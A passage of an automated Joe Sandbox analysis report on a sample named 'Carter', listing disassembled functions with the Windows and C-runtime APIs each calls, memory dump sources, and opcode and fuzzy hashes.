Opcode Fuzzy Hash: 95b4ed0e87b1f3f4ea78951d903415ee9dd0b63a5310bdd6718c992230dca05b
Instruction Fuzzy Hash: 99115E759083029BC711EF69ED4594ABBE8FF9A750F00891EF485872A1DFB09A44CF92

Function 00A942F9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00A93E72,?,?,?,00000000), ref: 00A94327
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00A93E72,?,?,?,00000000), ref: 00AD0717

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ea89e097f020d5e50f65688e1598472f1341ad18f79eb9c7add358bf13edbce6
Instruction ID: f1eb434af676f5d9c3dce304a3ff6b8390e81bfe0962f15d4802803a82ff4240
Opcode Fuzzy Hash: ea89e097f020d5e50f65688e1598472f1341ad18f79eb9c7add358bf13edbce6
Instruction Fuzzy Hash: E9014470244209BEF7241E248C86FA67ADCEB05768F50C315BAE56A1D0DAB55C568B14

Function 00AA0FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AA593C: __FF_MSGBANNER.LIBCMT ref: 00AA5953
Part of subcall function 00AA593C: __NMSG_WRITE.LIBCMT ref: 00AA595A
Part of subcall function 00AA593C: RtlAllocateHeap.NTDLL(01740000,00000000,00000001,?,00000004,?,?,00AA1003,?), ref: 00AA597F

std::exception::exception.LIBCMT ref: 00AA101C
__CxxThrowException@8.LIBCMT ref: 00AA1031

Part of subcall function 00AA87CB: RaiseException.KERNEL32(?,?,?,00B3CAF8,?,?,?,?,?,00AA1036,?,00B3CAF8,?,00000001), ref: 00AA8820

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: b9776d81190ba80065ba9c5b5f5b4b1e00f2720d247f70e2e3a56b731adb7415
Instruction ID: c29012550bc96f7a9a38a9381752da7bd97df58876ccca8df5265c61e2648757
Opcode Fuzzy Hash: b9776d81190ba80065ba9c5b5f5b4b1e00f2720d247f70e2e3a56b731adb7415
Instruction Fuzzy Hash: 02F0A47650421DB6CB21ABA8ED159DE7BFC9F02760F50446AF814A72D1EFB18BC0C2A4

Function 00AA581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AA584C
__lock_file.LIBCMT ref: 00AA586D

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 70dfe4c7473eb6f941a97d5a7ab449bfac797b3aee8241ce1b8663f59600b234
Instruction ID: bc1658cc3be21eae7208c755f9325cfd17512aa16dbe5b73a5d040d64805d1c8
Opcode Fuzzy Hash: 70dfe4c7473eb6f941a97d5a7ab449bfac797b3aee8241ce1b8663f59600b234
Instruction Fuzzy Hash: 52018471C00649EBCF11AF79CD0189EBB61AF86760F184115F8242B1E1DB398A21EF91

Function 00AA55C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58

__lock_file.LIBCMT ref: 00AA560B

Part of subcall function 00AA6E3E: __lock.LIBCMT ref: 00AA6E61

__fclose_nolock.LIBCMT ref: 00AA5616

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 1559d60b89368231b1f167067845b44ac7732f80a039728024bd7af6bc5c5cd5
Instruction ID: c9fc389840311a78ed505a40683ff5d8f5689c9438f09ff3bfa0b0871f83fa58
Opcode Fuzzy Hash: 1559d60b89368231b1f167067845b44ac7732f80a039728024bd7af6bc5c5cd5
Instruction Fuzzy Hash: 3EF0B471C02B069BD720ABB9890276E77E16F43330F258209E424AB1C1CB7C89019F59

Function 00A8E36D Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00A8E385
Sleep.KERNEL32(00000000), ref: 00A8E3BE

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: SleepTimetime
String ID:
API String ID: 346578373-0
Opcode ID: c4ed5d35022f36519fc7492f53aeb01e32da4c3dbf63e7cbbf633e8a16550a13
Instruction ID: 4aee850882120d85d13d80f6419ad08bb0c6d40fda3303b6d3e3b0a8eb6d69d4
Opcode Fuzzy Hash: c4ed5d35022f36519fc7492f53aeb01e32da4c3dbf63e7cbbf633e8a16550a13
Instruction Fuzzy Hash: 62F0F871250616AFD360FB69D559BA6B7F8EB49360F004429E82AC73A1DF60AC40CB91

Function 00AA5E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00AA5EB4
__ftell_nolock.LIBCMT ref: 00AA5EBF

Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: 3c90a370d6cbcc729ba38fafcd6107879483ef48a8ef4db12fd93e80bb08fc82
Instruction ID: 9aecf0b1ad49fe513e9f7a41f1c062a920d3d06c832813661a3ebde34dad5cc0
Opcode Fuzzy Hash: 3c90a370d6cbcc729ba38fafcd6107879483ef48a8ef4db12fd93e80bb08fc82
Instruction Fuzzy Hash: 58F0EC32D11615AAD710BB748A0375E76A0AF03331F254206F420BB1D1CF7C4E019B55

Function 00A95AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A95AEF
Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A95B1F

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 694697a6c3d17b0e7a6ef95d7899acee3584f3a1a6df0a51205c5de1da759938
Instruction ID: ed71b5cb0920d247f3d03c68132a106e2b62406637a71e046cdeb89200d2d2c4
Opcode Fuzzy Hash: 694697a6c3d17b0e7a6ef95d7899acee3584f3a1a6df0a51205c5de1da759938
Instruction Fuzzy Hash: 41F0A7719583089FDB929B24DC467D577BCA702308F0002E9FA4897292DFB14B88CF55

Function 00AFC355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: LoadString$__swprintf
String ID:
API String ID: 207118244-0
Opcode ID: db3f5d81911007e7f9a6e791eb5f62d3513149e1a416f57eff6ecf9f777dd70f
Instruction ID: 3b9ba3c465c9c05c0118d15915e4c254869507d370f5465be5e3cdd39b967efd
Opcode Fuzzy Hash: db3f5d81911007e7f9a6e791eb5f62d3513149e1a416f57eff6ecf9f777dd70f
Instruction Fuzzy Hash: 98B13C35A0010E9FCF14EF95C9919FEB7B5FF58760F10811AFA15AB291EB70A941CB50

Function 00A8A820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98adbf28a40f5d0034c1903875cd77dbebdb399a9fea0f49e0ac0170b9371455
Instruction ID: 117f5b2822fdb5acf41958aa9a69d4b4470de0e3b310a77d8d7cc56a50924cdf
Opcode Fuzzy Hash: 98adbf28a40f5d0034c1903875cd77dbebdb399a9fea0f49e0ac0170b9371455
Instruction Fuzzy Hash: A361B9706046069FEB10EF54C981F7AB7F5EF24300F11806EE91A9B291E774ED81CB62

Function 00A8D679 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a681f8819779e464b59a0b4eb288fb145cb92d3b73cf67965e6236f4ba5e5f8
Instruction ID: f4dae73e9ec02d6d0ccd116c380627d47d61330ab2c6ef7601b6fa53d14b060f
Opcode Fuzzy Hash: 0a681f8819779e464b59a0b4eb288fb145cb92d3b73cf67965e6236f4ba5e5f8
Instruction Fuzzy Hash: 90513935B00604AFCF14EB68CA92EAE77F6AF45750F158568F806AB392DB30ED41CB51

Function 00A9343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A9351A

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
Instruction ID: 6ca112584d007b714f0a43eb56c3070cc0cc7a7a44cfb937b8873494a96869b6
Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
Instruction Fuzzy Hash: F5319C7A204A02DFCF249F18D480A25F7F0FF49310B15C569E88A8B791DB30E881CB90

Function 00A9410A Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00A941B2

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5bd1d82b14f8fe5d041fe55ae66dd9f01d07409428ce4b3222bd75ddaff8ff2
Instruction ID: b3a52333c9e40ee5fe3653c47c411a362e2868e61d0c1a208573d82597fbf7b0
Opcode Fuzzy Hash: d5bd1d82b14f8fe5d041fe55ae66dd9f01d07409428ce4b3222bd75ddaff8ff2
Instruction Fuzzy Hash: B2313C71B00616AFCF18CF6DC884A9DB7F5BF58310F248719E81597710D770A9A18B90

Function 00ABE2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00ABE2EA

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 06d97045a3ff0aac559893b6e6e94a9588f9ca3a27201fe2221cef70fe20d7d8
Instruction ID: 3d4b4b5b17d35f51a9152329736c03bdc8b2c614dd2fd2711f1531c86fbf5eda
Opcode Fuzzy Hash: 06d97045a3ff0aac559893b6e6e94a9588f9ca3a27201fe2221cef70fe20d7d8
Instruction Fuzzy Hash: AB411874908341DFEB14EF14C588B5ABBE1BF45358F0989ACE8898B362C371EC85CB52

Function 00A949C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A94B29: FreeLibrary.KERNEL32(00000000,?), ref: 00A94B63

Part of subcall function 00AA547B: __wfsopen.LIBCMT ref: 00AA5486

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A927AF,?,00000001), ref: 00A949F4

Part of subcall function 00A94ADE: FreeLibrary.KERNEL32(00000000), ref: 00A94B18

Part of subcall function 00A948B0: _memmove.LIBCMT ref: 00A948FA

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 333ac3d7428ddd6b8973de9ade03dbee7942c2beba086517e31ec518f3b007df
Instruction ID: e1032ed36b5167377229dd9041cb01c573103245c4af7c6dba5606da54b6b442
Opcode Fuzzy Hash: 333ac3d7428ddd6b8973de9ade03dbee7942c2beba086517e31ec518f3b007df
Instruction Fuzzy Hash: AE11E332750205ABDF10FB70CE06FAE77E99F48741F10842AF542A7591EF709E12ABA4

Function 00ABE3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00ABE3CE

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: bb1c88631b2d48c29f1fb5d8f37f944824daf594443df68d435730b21e26af8c
Instruction ID: c3c89377b96d9e38c2320e137df147b9536b9bf1cc75378619b1a56c96a2222b
Opcode Fuzzy Hash: bb1c88631b2d48c29f1fb5d8f37f944824daf594443df68d435730b21e26af8c
Instruction Fuzzy Hash: EE212EB4908341DFDB14EF14C548A5ABBE4BF84304F0589ACE88A57362D331E849CB92

Function 00A94220 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00A93CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00A94276

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 173fbd75e8888eb225e33ddbd847703e20c2e74eb8a070b06b95215a1356fefc
Instruction ID: 00cbb74f9e4a45e46b296b9c0964ee7a3fc1c8a222af95e14a1da82565c3cd76
Opcode Fuzzy Hash: 173fbd75e8888eb225e33ddbd847703e20c2e74eb8a070b06b95215a1356fefc
Instruction Fuzzy Hash: BC113A352007019FDB20CF55C880FA2B7F5FF88710F10C92EE8AA8AA50D7B0E846CB60

Function 00A91A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A91A77

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
Instruction ID: 2604d5948a8719738e1fc4ed943517223487456092b3e4c1a08f14ec968b0ae4
Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
Instruction Fuzzy Hash: 4D01D6722017026ED7245B38DD02F67BBE8DB457E0F10852AF51ACB5D1EB31E8408794

Function 00ADFEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00ADFF33

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: cc5625e1f20a0cd097ccf851359f3205128236cd68aebd9dbd04220413b2413c
Instruction ID: 0de7ba72fe8bf1e35bbc04a309ee80a358d93f27938aff6511743d405cd7a545
Opcode Fuzzy Hash: cc5625e1f20a0cd097ccf851359f3205128236cd68aebd9dbd04220413b2413c
Instruction Fuzzy Hash: 2C01D132200225AFCB24DF2DC99196BB7A9EF8A364714842EF80ACB345E631E801C790

Function 00AF495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00AF4998

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: e645e859787772b446803af957bf953bbb341b40517370a53d3260d2f7da31b3
Instruction ID: ca8ccb3b4938b18c79e91df6006d2d3a072c22c56c70dbe355ba472886a98861
Opcode Fuzzy Hash: e645e859787772b446803af957bf953bbb341b40517370a53d3260d2f7da31b3
Instruction Fuzzy Hash: ADF03135608109BFCB14FB65D946CAF77BCEF49360B004059F9089B291EF70AD41C750

Function 00AE7C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031

_memset.LIBCMT ref: 00AE7CB4

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
